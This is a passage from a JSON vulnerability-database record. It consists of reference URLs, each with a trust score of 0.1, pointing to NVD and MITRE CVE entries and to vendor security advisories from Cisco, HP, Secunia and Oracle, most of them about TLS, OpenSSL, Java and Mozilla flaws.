"url": "http://marc.info/?l=cryptography\u0026amp;m=125752275331877\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "https://kb.bluecoat.com/index?page=content\u0026amp;id=sa50"
},
{
"trust": 0.1,
"url": "https://github.com/adesprets/dpsslclientprofile"
},
{
"trust": 0.1,
"url": "https://github.com/galeone/letsencrypt-lighttpd"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20091105-cve-2009-3555"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=20886"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0731"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0731"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44293"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44293/"
},
{
"trust": 0.1,
"url": "http://secunia.com/research/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html#appendixas"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44293/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/company/jobs/open_positions/reverse_engineer"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://icedtea.classpath.org/hg/release/icedtea6-1.8/rev/a6a02193b073"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3728"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3874"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3728"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3876"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0091"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3884"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3873"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3881"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2409"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2409"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0094"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3883"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3884"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3869"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0095"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0840"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3882"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3879"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0092"
},
{
"trust": 0.1,
"url": "http://blogs.sun.com/darcy/resource/openjdk_6/openjdk6-b18-changes-summary.html"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0093"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3881"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0088"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3877"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3883"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0084"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3869"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0845"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3871"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3882"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0838"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3873"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3875"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3874"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3885"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0847"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3871"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3877"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3876"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0085"
},
{
"trust": 0.1,
"url": "http://article.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/8938"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0082"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3880"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3885"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0837"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3880"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3879"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0130"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0128"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0129"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-7270"
},
{
"trust": 0.1,
"url": "http://h20000.www2.hp.com/bizsupport/techsupport/softwareindex.jsp?lang=en\u0026cc=us\u0026prodnameid=3188475\u0026prodtypeid=329290\u0026prodseriesid=3188465\u0026swlang=8\u0026taskid=135\u0026swenvoid=1113"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2002-0840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0492"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3292"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-3918"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0010"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2003-0542"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-3747"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3291"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2002-0839"
},
{
"trust": 0.1,
"url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws_php.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-3357"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-3352"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2491"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5000"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3095"
},
{
"trust": 0.1,
"url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-6388"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-1891"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1965"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3985"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0079"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4688"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4070"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0082"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2371"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0169"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4061"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1210"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4181"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1832"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1994"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4058"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1828"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0353"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1838"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3975"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2766"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4061"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3767"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0473"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0172"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1971"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0479"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2043"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3175"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3973"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3655"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2760"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-1187"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1961"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0447"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2462"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0456"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2770"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1125"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3958"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3777"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3003"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0067"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3174"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0168"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0057"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0443"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2993"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3376"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5017"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1940"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3069"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2989"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5836"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0182"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4179"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2436"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3072"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1208"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3967"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2375"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2376"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3971"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3772"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3977"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3965"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0469"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3978"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4183"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1834"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2472"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3378"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2767"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1952"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0078"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0170"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0164"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0775"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3400"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1211"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3372"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2769"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4188"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5012"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4206"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5354"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5504"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4067"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3648"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0776"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3071"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0477"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2467"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0475"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3962"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2408"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1304"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4201"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4202"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4182"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1206"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3990"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1975"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1392"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4070"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2044"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3183"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3835"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4068"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5507"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4059"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5023"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1308"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1044"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5508"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0654"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0070"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4065"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1307"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3866"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0080"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2984"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0478"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1213"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0352"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5014"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2664"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0051"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3989"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3984"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3371"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3382"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4180"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4068"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4194"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4582"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5502"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4193"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2437"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3978"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1835"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3993"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5506"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3375"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3078"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0173"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3075"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3969"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0462"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2605"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1169"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1311"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4066"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3658"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1973"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3004"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1950"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1972"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2369"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1215"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4062"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0463"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3001"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0167"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3381"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3988"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0452"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-3837"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1837"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2374"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3994"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1960"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1963"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3167"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0774"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4065"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5022"
},
{
"trust": 0.1,
